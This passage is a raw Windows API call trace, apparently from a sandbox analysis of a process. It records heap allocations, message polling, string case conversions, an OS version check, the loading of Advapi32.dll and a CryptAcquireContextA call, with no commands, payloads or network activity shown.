hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.239] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.239] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.239] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.240] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.240] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.240] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.240] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0208.240] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.241] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.242] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.242] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0208.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.251] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.251] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.251] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.252] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7ca18) returned 1 [0208.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.253] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.253] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.253] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.253] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.254] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.254] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.254] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.254] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.254] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.254] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 